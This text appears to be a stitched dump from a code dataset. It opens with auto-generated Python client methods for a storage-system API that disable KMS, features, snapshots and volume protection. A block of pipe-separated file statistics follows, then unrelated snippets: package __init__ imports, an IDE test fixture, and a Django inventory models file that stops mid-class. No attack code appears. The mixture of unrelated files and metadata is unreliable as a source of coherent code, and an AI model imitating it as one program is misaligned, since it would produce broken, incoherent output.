    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])
    # This endpoint takes no request body.
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=None,
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=params.get('callback'))
def symbol_disable_external_kms(self, system_id, body, **kwargs):
    """
    Disable external KMS.
    Documented return codes: ok, externalKmsNotEnabled, cannotDisableNoKey, externalKmsDisabledNoKey.

    Synchronous by default; pass a `callback` keyword argument (a callable
    that receives the response) to run asynchronously, in which case the
    request thread is returned instead of the response.

    :param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
    :param str body: (required)
    :param str controller: Controller selection (optional)
    :param bool verbose_error_response: Request verbose error payloads (optional)
    :param callback: Callable invoked with the response for async requests (optional)
    :return: WrappedLockKeyReturn, or the request thread when called asynchronously.
    :raises ValueError: if a required parameter is missing or the response data format is unknown.
    :raises TypeError: if the response data type differs from what is expected.
    :raises ApiException: on HTTP error codes (422 and above).
    """
    # Reject keyword arguments this endpoint does not understand.
    recognized = ('system_id', 'body', 'controller', 'verbose_error_response', 'callback')
    params = {'system_id': system_id, 'body': body}
    for name, value in iteritems(kwargs):
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_disable_external_kms" % name
            )
        params[name] = value
    # Required parameters must be present and non-None.
    if params.get('system_id') is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_disable_external_kms`")
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_disable_external_kms`")
    resource_path = '/storage-systems/{system-id}/symbol/disableExternalKMS'.replace('{format}', 'json')
    path_params = {'system-id': params['system_id']}
    # Optional query parameters, translated to their wire names.
    query_params = {}
    if 'controller' in params:
        query_params['controller'] = params['controller']
    if 'verbose_error_response' in params:
        query_params['verboseErrorResponse'] = params['verbose_error_response']
    # Negotiate HTTP headers; omit Accept entirely when nothing is selectable.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=params.get('body'),
                                    post_params=[],
                                    files={},
                                    response_type='WrappedLockKeyReturn',
                                    auth_settings=['basicAuth'],
                                    callback=params.get('callback'))
def symbol_disable_feature(self, system_id, body, **kwargs):
    """
    Disable a single add-on (optional) feature.
    Documented return codes: ok, error, invalidSafeCapability, disableNotPermitted.

    Synchronous by default; pass a `callback` keyword argument (a callable
    that receives the response) to run asynchronously, in which case the
    request thread is returned instead of the response.

    :param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
    :param str body: The Capability value for the "premium" feature to be disabled. (required)
    :param str controller: Controller selection (optional)
    :param bool verbose_error_response: Request verbose error payloads (optional)
    :param callback: Callable invoked with the response for async requests (optional)
    :return: str, or the request thread when called asynchronously.
    :raises ValueError: if a required parameter is missing or the response data format is unknown.
    :raises TypeError: if the response data type differs from what is expected.
    :raises ApiException: on HTTP error codes (422 and above).
    """
    # Reject keyword arguments this endpoint does not understand.
    recognized = ('system_id', 'body', 'controller', 'verbose_error_response', 'callback')
    params = {'system_id': system_id, 'body': body}
    for name, value in iteritems(kwargs):
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_disable_feature" % name
            )
        params[name] = value
    # Required parameters must be present and non-None.
    if params.get('system_id') is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_disable_feature`")
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_disable_feature`")
    resource_path = '/storage-systems/{system-id}/symbol/disableFeature'.replace('{format}', 'json')
    path_params = {'system-id': params['system_id']}
    # Optional query parameters, translated to their wire names.
    query_params = {}
    if 'controller' in params:
        query_params['controller'] = params['controller']
    if 'verbose_error_response' in params:
        query_params['verboseErrorResponse'] = params['verbose_error_response']
    # Negotiate HTTP headers; omit Accept entirely when nothing is selectable.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=params.get('body'),
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=params.get('callback'))
def symbol_disable_feature_by_ref(self, system_id, body, **kwargs):
    """
    Disable a feature identified by reference.
    Documented return codes: uninitialized, ok, error, illegalParam, noHeap, disableNotPermitted, disableEvaluationFeatureNotPermitted, invalidFeatureref.

    Synchronous by default; pass a `callback` keyword argument (a callable
    that receives the response) to run asynchronously, in which case the
    request thread is returned instead of the response.

    :param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
    :param str body: A reference to the feature to disable. (required)
    :param str controller: Controller selection (optional)
    :param bool verbose_error_response: Request verbose error payloads (optional)
    :param callback: Callable invoked with the response for async requests (optional)
    :return: str, or the request thread when called asynchronously.
    :raises ValueError: if a required parameter is missing or the response data format is unknown.
    :raises TypeError: if the response data type differs from what is expected.
    :raises ApiException: on HTTP error codes (422 and above).
    """
    # Reject keyword arguments this endpoint does not understand.
    recognized = ('system_id', 'body', 'controller', 'verbose_error_response', 'callback')
    params = {'system_id': system_id, 'body': body}
    for name, value in iteritems(kwargs):
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_disable_feature_by_ref" % name
            )
        params[name] = value
    # Required parameters must be present and non-None.
    if params.get('system_id') is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_disable_feature_by_ref`")
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_disable_feature_by_ref`")
    resource_path = '/storage-systems/{system-id}/symbol/disableFeatureByRef'.replace('{format}', 'json')
    path_params = {'system-id': params['system_id']}
    # Optional query parameters, translated to their wire names.
    query_params = {}
    if 'controller' in params:
        query_params['controller'] = params['controller']
    if 'verbose_error_response' in params:
        query_params['verboseErrorResponse'] = params['verbose_error_response']
    # Negotiate HTTP headers; omit Accept entirely when nothing is selectable.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=params.get('body'),
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=params.get('callback'))
def symbol_disable_flash_cache_volume(self, system_id, body, **kwargs):
    """
    Delete the proxy and turn off flash cache volume attributes on the referenced user volume.
    Documented return codes: ok, error, illegalParam, noHeap, volumeNotExist, internalError, invalidVolumeref, notFlashcacheVol, flashcacheDeleted.

    Synchronous by default; pass a `callback` keyword argument (a callable
    that receives the response) to run asynchronously, in which case the
    request thread is returned instead of the response.

    :param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
    :param str body: A reference to the volume to disable. (required)
    :param str controller: Controller selection (optional)
    :param bool verbose_error_response: Request verbose error payloads (optional)
    :param callback: Callable invoked with the response for async requests (optional)
    :return: str, or the request thread when called asynchronously.
    :raises ValueError: if a required parameter is missing or the response data format is unknown.
    :raises TypeError: if the response data type differs from what is expected.
    :raises ApiException: on HTTP error codes (422 and above).
    """
    # Reject keyword arguments this endpoint does not understand.
    recognized = ('system_id', 'body', 'controller', 'verbose_error_response', 'callback')
    params = {'system_id': system_id, 'body': body}
    for name, value in iteritems(kwargs):
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_disable_flash_cache_volume" % name
            )
        params[name] = value
    # Required parameters must be present and non-None.
    if params.get('system_id') is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_disable_flash_cache_volume`")
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_disable_flash_cache_volume`")
    resource_path = '/storage-systems/{system-id}/symbol/disableFlashCacheVolume'.replace('{format}', 'json')
    path_params = {'system-id': params['system_id']}
    # Optional query parameters, translated to their wire names.
    query_params = {}
    if 'controller' in params:
        query_params['controller'] = params['controller']
    if 'verbose_error_response' in params:
        query_params['verboseErrorResponse'] = params['verbose_error_response']
    # Negotiate HTTP headers; omit Accept entirely when nothing is selectable.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=params.get('body'),
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=params.get('callback'))
def symbol_disable_snapshot(self, system_id, body, **kwargs):
    """
    Disable (stop) the indicated snapshot volume.
    Documented return codes: ok, illegalParam, noHeap, tryAlternate, internalError, invalidVolumeref, snapNotAvailable, notDisabled, repositoryOffline, ghostVolume, repositoryMissing, repositoryFailed, baseVolumeFailed, baseVolumeOffline.

    Synchronous by default; pass a `callback` keyword argument (a callable
    that receives the response) to run asynchronously, in which case the
    request thread is returned instead of the response.

    :param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
    :param str body: The SnapshotRef of the snapshot volume on which the operation is to be performed. (required)
    :param str controller: Controller selection (optional)
    :param bool verbose_error_response: Request verbose error payloads (optional)
    :param callback: Callable invoked with the response for async requests (optional)
    :return: str, or the request thread when called asynchronously.
    :raises ValueError: if a required parameter is missing or the response data format is unknown.
    :raises TypeError: if the response data type differs from what is expected.
    :raises ApiException: on HTTP error codes (422 and above).
    """
    # Reject keyword arguments this endpoint does not understand.
    recognized = ('system_id', 'body', 'controller', 'verbose_error_response', 'callback')
    params = {'system_id': system_id, 'body': body}
    for name, value in iteritems(kwargs):
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_disable_snapshot" % name
            )
        params[name] = value
    # Required parameters must be present and non-None.
    if params.get('system_id') is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_disable_snapshot`")
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_disable_snapshot`")
    resource_path = '/storage-systems/{system-id}/symbol/disableSnapshot'.replace('{format}', 'json')
    path_params = {'system-id': params['system_id']}
    # Optional query parameters, translated to their wire names.
    query_params = {}
    if 'controller' in params:
        query_params['controller'] = params['controller']
    if 'verbose_error_response' in params:
        query_params['verboseErrorResponse'] = params['verbose_error_response']
    # Negotiate HTTP headers; omit Accept entirely when nothing is selectable.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=params.get('body'),
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=params.get('callback'))
def symbol_disable_snapshot_collection(self, system_id, body, **kwargs):
    """
    Disable (stop) each snapshot volume identified in the argument list.

    Precondition checks are performed for every snapshot before any is
    disabled; if any snapshot fails validation, or any disable operation
    fails, the entire command fails and no snapshots are disabled.
    Disabling an already-disabled snapshot is a successful no-op.
    Documented return codes: ok, illegalParam, noHeap, internalError, invalidVolumeref, snapNotAvailable, notDisabled, repositoryOffline, ghostVolume, repositoryMissing, repositoryFailed, baseVolumeFailed, baseVolumeOffline.

    Synchronous by default; pass a `callback` keyword argument (a callable
    that receives the response) to run asynchronously, in which case the
    request thread is returned instead of the response.

    :param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
    :param SnapshotRefList body: The snapshot volumes to disable; one to MAX_SNAPSHOT_COLLECTION_SIZE references. (required)
    :param str controller: Controller selection (optional)
    :param bool verbose_error_response: Request verbose error payloads (optional)
    :param callback: Callable invoked with the response for async requests (optional)
    :return: str, or the request thread when called asynchronously.
    :raises ValueError: if a required parameter is missing or the response data format is unknown.
    :raises TypeError: if the response data type differs from what is expected.
    :raises ApiException: on HTTP error codes (422 and above).
    """
    # Reject keyword arguments this endpoint does not understand.
    recognized = ('system_id', 'body', 'controller', 'verbose_error_response', 'callback')
    params = {'system_id': system_id, 'body': body}
    for name, value in iteritems(kwargs):
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_disable_snapshot_collection" % name
            )
        params[name] = value
    # Required parameters must be present and non-None.
    if params.get('system_id') is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_disable_snapshot_collection`")
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_disable_snapshot_collection`")
    resource_path = '/storage-systems/{system-id}/symbol/disableSnapshotCollection'.replace('{format}', 'json')
    path_params = {'system-id': params['system_id']}
    # Optional query parameters, translated to their wire names.
    query_params = {}
    if 'controller' in params:
        query_params['controller'] = params['controller']
    if 'verbose_error_response' in params:
        query_params['verboseErrorResponse'] = params['verbose_error_response']
    # Negotiate HTTP headers; omit Accept entirely when nothing is selectable.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=params.get('body'),
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=params.get('callback'))
def symbol_disable_volume_protection_information(self, system_id, body, **kwargs):
    """
    Disable protection information (PI) usage for the specified volume.
    Documented return codes: ok, volumeHasSnapshotRelationship, volumeHasMirrorRelationship, volumeHasVolcopyRelationship.

    Synchronous by default; pass a `callback` keyword argument (a callable
    that receives the response) to run asynchronously, in which case the
    request thread is returned instead of the response.

    :param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
    :param str body: (required)
    :param str controller: Controller selection (optional)
    :param bool verbose_error_response: Request verbose error payloads (optional)
    :param callback: Callable invoked with the response for async requests (optional)
    :return: str, or the request thread when called asynchronously.
    :raises ValueError: if a required parameter is missing or the response data format is unknown.
    :raises TypeError: if the response data type differs from what is expected.
    :raises ApiException: on HTTP error codes (422 and above).
    """
    # Reject keyword arguments this endpoint does not understand.
    recognized = ('system_id', 'body', 'controller', 'verbose_error_response', 'callback')
    params = {'system_id': system_id, 'body': body}
    for name, value in iteritems(kwargs):
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_disable_volume_protection_information" % name
            )
        params[name] = value
    # Required parameters must be present and non-None.
    if params.get('system_id') is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_disable_volume_protection_information`")
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_disable_volume_protection_information`")
    resource_path = '/storage-systems/{system-id}/symbol/disableVolumeProtectionInformation'.replace('{format}', 'json')
    path_params = {'system-id': params['system_id']}
    # Optional query parameters, translated to their wire names.
    query_params = {}
    if 'controller' in params:
        query_params['controller'] = params['controller']
    if 'verbose_error_response' in params:
        query_params['verboseErrorResponse'] = params['verbose_error_response']
    # Negotiate HTTP headers; omit Accept entirely when nothing is selectable.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=params.get('body'),
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=params.get('callback'))
def symbol_discover_controllers(self, system_id, **kwargs):
    """
    Discover the storage arrays and controllers known to the RPC server.

    Issues a POST to
    ``/storage-systems/{system-id}/symbol/discoverControllers`` and returns
    a DiscoveryResponse identifying the storage arrays and controllers the
    RPC server knows about (and whether that server is a RAID controller or
    a SYMbol RPC UTM agent). Documented return codes: ok.

    The request is synchronous by default; pass a ``callback`` keyword
    argument to run asynchronously, in which case the request thread is
    returned and the callback is invoked with the response.

    :param str system_id: Unique identifier of the storage-system — the id
        or the WWN. (required)
    :param str controller: Controller selection. (optional)
    :param bool verbose_error_response: (optional)
    :param callback: Function invoked with the response for an
        asynchronous request. (optional)
    :return: DiscoveryResponse, or the request thread when called
        asynchronously.
    :raises ValueError: If a required parameter is missing.
    :raises TypeError: If an unexpected keyword argument is supplied.
    """
    accepted = ('system_id', 'controller', 'verbose_error_response', 'callback')
    params = {'system_id': system_id}
    for key, val in iteritems(kwargs):
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_discover_controllers" % key
            )
        params[key] = val

    # 'system_id' is mandatory and must not be None.
    if params.get('system_id') is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_discover_controllers`")

    resource_path = '/storage-systems/{system-id}/symbol/discoverControllers'.replace('{format}', 'json')

    path_params = {}
    if 'system_id' in params:
        path_params['system-id'] = params['system_id']

    query_params = {}
    if 'controller' in params:
        query_params['controller'] = params['controller']
    if 'verbose_error_response' in params:
        query_params['verboseErrorResponse'] = params['verbose_error_response']

    header_params = {}
    # Negotiate the `Accept` header; omit it entirely when nothing matches.
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    return self.api_client.call_api(
        resource_path, 'POST',
        path_params,
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='DiscoveryResponse',
        auth_settings=['basicAuth'],
        callback=params.get('callback'))
| 39.02334
| 845
| 0.52609
| 18,373
| 193,946
| 5.384804
| 0.034072
| 0.038813
| 0.032344
| 0.021024
| 0.917845
| 0.909254
| 0.901926
| 0.889382
| 0.876838
| 0.870541
| 0
| 0.001124
| 0.403911
| 193,946
| 4,969
| 846
| 39.031193
| 0.854639
| 0.315789
| 0
| 0.870852
| 0
| 0
| 0.205608
| 0.06867
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020929
| false
| 0
| 0.003063
| 0
| 0.044921
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cab4766598e999eebf3eefc09a9aa642b8d3c8d6
| 191
|
py
|
Python
|
great_expectations/expectations/metrics/column_pair_map_metrics/__init__.py
|
vanderGoes/great_expectations
|
9790cd992a8a4de672c640e89ddd7278a0ca0889
|
[
"Apache-2.0"
] | 6,451
|
2017-09-11T16:32:53.000Z
|
2022-03-31T23:27:49.000Z
|
great_expectations/expectations/metrics/column_pair_map_metrics/__init__.py
|
vanderGoes/great_expectations
|
9790cd992a8a4de672c640e89ddd7278a0ca0889
|
[
"Apache-2.0"
] | 3,892
|
2017-09-08T18:57:50.000Z
|
2022-03-31T23:15:20.000Z
|
great_expectations/expectations/metrics/column_pair_map_metrics/__init__.py
|
vanderGoes/great_expectations
|
9790cd992a8a4de672c640e89ddd7278a0ca0889
|
[
"Apache-2.0"
] | 1,023
|
2017-09-08T15:22:05.000Z
|
2022-03-31T21:17:08.000Z
|
from .column_pair_values_equal import ColumnPairValuesEqual
from .column_pair_values_greater import ColumnPairValuesAGreaterThanB
from .column_pair_values_in_set import ColumnPairValuesInSet
| 47.75
| 69
| 0.921466
| 22
| 191
| 7.545455
| 0.545455
| 0.180723
| 0.253012
| 0.361446
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.062827
| 191
| 3
| 70
| 63.666667
| 0.927374
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cad6baa9afa72874f165b4b9b259949bfeae59f3
| 116
|
py
|
Python
|
python/testData/quickdoc/ReturnTypeWrappedBecauseOfFunctionName.py
|
truthiswill/intellij-community
|
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/quickdoc/ReturnTypeWrappedBecauseOfFunctionName.py
|
truthiswill/intellij-community
|
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/quickdoc/ReturnTypeWrappedBecauseOfFunctionName.py
|
truthiswill/intellij-community
|
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
def fu<the_ref>nc01234567890123456789012345678901234567890123456789012345678901234567890123456789() -> int:
pass
| 58
| 107
| 0.87069
| 7
| 116
| 14.285714
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.740741
| 0.068966
| 116
| 2
| 108
| 58
| 0.185185
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0.5
| 0
| null | null | 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
1b3d942244741ecc4b1ea952bf7952ef13e4c4b7
| 130
|
py
|
Python
|
PSMNet-FRR/models/__init__.py
|
TaooCAI/FRR
|
b49e2a0598df3284f8e46cf6e01fbd7202ffa4c7
|
[
"MIT"
] | null | null | null |
PSMNet-FRR/models/__init__.py
|
TaooCAI/FRR
|
b49e2a0598df3284f8e46cf6e01fbd7202ffa4c7
|
[
"MIT"
] | null | null | null |
PSMNet-FRR/models/__init__.py
|
TaooCAI/FRR
|
b49e2a0598df3284f8e46cf6e01fbd7202ffa4c7
|
[
"MIT"
] | null | null | null |
from .basic import PSMNet as basic
from .stackhourglass import PSMNet as stackhourglass
from .stereoSRR import PSMNet as stereoSRR
| 43.333333
| 52
| 0.846154
| 18
| 130
| 6.111111
| 0.388889
| 0.327273
| 0.381818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.130769
| 130
| 3
| 53
| 43.333333
| 0.973451
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1b646ed79aaa6c4b98c9c4939c61ed17741dceb6
| 154
|
py
|
Python
|
python/taichi/linalg/__init__.py
|
gaoxinge/taichi
|
86d403f071b8505858763d4712b37cd71b89db91
|
[
"MIT"
] | 1
|
2020-11-10T07:17:01.000Z
|
2020-11-10T07:17:01.000Z
|
python/taichi/linalg/__init__.py
|
gaoxinge/taichi
|
86d403f071b8505858763d4712b37cd71b89db91
|
[
"MIT"
] | 1
|
2020-08-24T05:18:43.000Z
|
2020-08-24T05:18:43.000Z
|
python/taichi/linalg/__init__.py
|
gaoxinge/taichi
|
86d403f071b8505858763d4712b37cd71b89db91
|
[
"MIT"
] | null | null | null |
"""Taichi support module for sparse matrix operations.
"""
from taichi.linalg.sparse_matrix import *
from taichi.linalg.sparse_solver import SparseSolver
| 30.8
| 54
| 0.818182
| 20
| 154
| 6.2
| 0.6
| 0.193548
| 0.258065
| 0.354839
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103896
| 154
| 4
| 55
| 38.5
| 0.898551
| 0.331169
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1b6f7123643ee59a056b9f550ba28d9dccc2f88b
| 12,773
|
py
|
Python
|
inventario/models.py
|
vvilche1/odin
|
ca24e727d94b34b33eb51de50fbcc8a5505cc559
|
[
"Apache-2.0"
] | null | null | null |
inventario/models.py
|
vvilche1/odin
|
ca24e727d94b34b33eb51de50fbcc8a5505cc559
|
[
"Apache-2.0"
] | null | null | null |
inventario/models.py
|
vvilche1/odin
|
ca24e727d94b34b33eb51de50fbcc8a5505cc559
|
[
"Apache-2.0"
] | null | null | null |
# This is an auto-generated Django model module.
# You'll have to do the following manually to clean this up:
# * Rearrange models' order
# * Make sure each model has one field with primary_key=True
# * Make sure each ForeignKey has `on_delete` set to the desired behavior.
# * Remove `managed = False` lines if you wish to allow Django to create, modify, and delete the table
# Feel free to rename the models, but don't rename db_table values or field names.
from django.db import models
class Campus(models.Model):
    """Campus/site record; maps to the pre-existing `campus` table."""
    id_cam = models.AutoField(primary_key=True)
    nombre = models.CharField(unique=True, max_length=100)
    direccion = models.CharField(max_length=100)
    cpostal = models.CharField(max_length=20)
    fono = models.CharField(max_length=20)
    email = models.CharField(max_length=100)
    ubicacion = models.CharField(max_length=100)
    abreviatura = models.CharField(max_length=4)
    descripcion = models.CharField(max_length=800)

    def __str__(self):
        # Display the campus by its (unique) name.
        return self.nombre

    class Meta:
        # Schema is owned by the legacy database; Django must not create,
        # modify, or delete this table.
        managed = False
        db_table = 'campus'
class Usuario(models.Model):
    """Application user attached to a Campus; maps to the `usuario` table."""
    id_cam = models.ForeignKey(Campus, models.DO_NOTHING, db_column='id_cam')
    idusuario = models.AutoField(primary_key=True)
    nombre = models.CharField(max_length=35)
    rut = models.IntegerField()
    # NOTE(review): password stored as a plain CharField — presumably
    # plaintext or externally hashed; confirm against the login code.
    password = models.CharField(max_length=35)

    def __str__(self):
        return self.nombre

    class Meta:
        # Legacy table; not managed by Django migrations.
        managed = False
        db_table = 'usuario'
class Resp(models.Model):
    """Per-status item-count snapshot; maps to the legacy `resp` table.

    Same counter layout as Issue/Libros/Cd — one row of totals broken down
    by item status (inventoried, on loan, overdue by borrower type, lost,
    damaged, in transit, cataloguing problems, missing).
    """
    # Primary key shared with the owning Inventario row (see Inventario FK).
    idinventario_resp = models.PositiveIntegerField(primary_key=True)
    total_items = models.IntegerField()
    total_items_inventariados = models.IntegerField()
    total_items_en_prestamos_permanente = models.IntegerField()
    total_items_en_morosos_alumnos = models.IntegerField()
    total_items_morosos_academicos = models.IntegerField()
    total_items_morosos_funcionarios = models.IntegerField()
    total_items_morosos_postgrado = models.IntegerField()
    total_items_morosos_pib = models.IntegerField()
    total_items_extraviados = models.IntegerField()
    total_items_perdidos = models.IntegerField()
    total_items_inutilizados = models.IntegerField()
    total_items_deteriorados_para_empastar = models.IntegerField()
    total_items_transito = models.IntegerField()
    total_items_problemas_de_catalogacion = models.IntegerField()
    total_items_faltantes = models.IntegerField()

    class Meta:
        # Legacy table; not managed by Django migrations.
        managed = False
        db_table = 'resp'
class Issue(models.Model):
    """Per-status item-count snapshot; maps to the legacy `issue` table.

    Counter layout identical to Resp/Libros/Cd.
    """
    idinventario_issue = models.PositiveIntegerField(primary_key=True)
    total_items = models.IntegerField()
    total_items_inventariados = models.IntegerField()
    total_items_en_prestamos_permanente = models.IntegerField()
    total_items_en_morosos_alumnos = models.IntegerField()
    total_items_morosos_academicos = models.IntegerField()
    total_items_morosos_funcionarios = models.IntegerField()
    total_items_morosos_postgrado = models.IntegerField()
    total_items_morosos_pib = models.IntegerField()
    total_items_extraviados = models.IntegerField()
    total_items_perdidos = models.IntegerField()
    total_items_inutilizados = models.IntegerField()
    total_items_deteriorados_para_empastar = models.IntegerField()
    total_items_transito = models.IntegerField()
    total_items_problemas_de_catalogacion = models.IntegerField()
    total_items_faltantes = models.IntegerField()

    class Meta:
        # Legacy table; not managed by Django migrations.
        managed = False
        db_table = 'issue'
class Libros(models.Model):
    """Per-status item-count snapshot; maps to the legacy `libros` table.

    Counter layout identical to Resp/Issue/Cd.
    """
    idinventario_libros = models.PositiveIntegerField(primary_key=True)
    total_items = models.IntegerField()
    total_items_inventariados = models.IntegerField()
    total_items_en_prestamos_permanente = models.IntegerField()
    total_items_en_morosos_alumnos = models.IntegerField()
    total_items_morosos_academicos = models.IntegerField()
    total_items_morosos_funcionarios = models.IntegerField()
    total_items_morosos_postgrado = models.IntegerField()
    total_items_morosos_pib = models.IntegerField()
    total_items_extraviados = models.IntegerField()
    total_items_perdidos = models.IntegerField()
    total_items_inutilizados = models.IntegerField()
    total_items_deteriorados_para_empastar = models.IntegerField()
